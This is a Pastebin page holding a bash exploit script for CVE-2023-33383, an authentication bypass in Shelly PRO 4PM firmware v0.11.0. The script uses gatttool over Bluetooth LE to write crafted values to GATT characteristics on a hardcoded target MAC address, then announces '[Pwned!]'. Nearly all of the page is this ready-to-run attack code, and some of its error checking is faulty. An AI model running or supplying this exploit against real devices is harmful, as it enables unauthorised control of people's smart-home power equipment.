API tools faq
paste
Advertisement
FlyFar

Shelly PRO 4PM v0.11.0 - Authentication Bypass - CVE-2023-33383

FlyFar
Jan 22nd, 2024
753
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.15 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
  4. # Google Dork: NA
  5. # Date: 2nd August 2023
  6. # Exploit Author: The Security Team [exploitsecurity.io]
  7. # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
  8. # Vendor Homepage: https://www.shelly.com/
  9. # Software Link: NA
  10. # Version: Firmware v0.11.0 (REQUIRED)
  11. # Tested on: MacOS/Linux
  12. # CVE : CVE-2023-33383
  13.  
  14. IFS=
  15. failed=$false
  16. RED="\e[31m"
  17. GREEN="\e[92m"
  18. WHITE="\e[97m"
  19. ENDCOLOR="\e[0m"
  20. substring="Connection refused"
  21.  
  22.  
  23. banner()
  24.     {
  25.         clear
  26.         echo -e "${GREEN}[+]*********************************************************[+]"
  27.         echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
  28.         echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
  29.         echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
  30.         echo -e "${GREEN}[+]*********************************************************[+]"
  31.         echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
  32.     }
  33.  
  34. banner
  35. read -s -n 1 key
  36. if [ "$key" = "x" ]; then
  37.     exit 0;
  38. elif [ "$key" = "" ]; then
  39.     gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
  40.     if [ -z "$gattout" ]; then
  41.         echo -e "${RED}Connection timed out${ENDCOLOR}"
  42.         exit 0;
  43.     else
  44.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
  45.     echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
  46.     sleep 1
  47.     if [ $? -eq 1 ]; then
  48.        $failed=$true
  49.        exit 0;
  50.     fi
  51.     sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
  52.     sleep 1
  53.     if [ $? -eq 1 ]; then
  54.         $failed=$true
  55.         echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
  56.         exit 0;
  57.     else
  58.        sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
  59.        sleep 1
  60.        for i in {1..5}
  61.        do
  62.           echo -ne "${GREEN}."
  63.           sleep 1
  64.        done
  65.        echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
  66.     fi
  67. fi
  68. fi
  69.            
Tags: Exploit Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!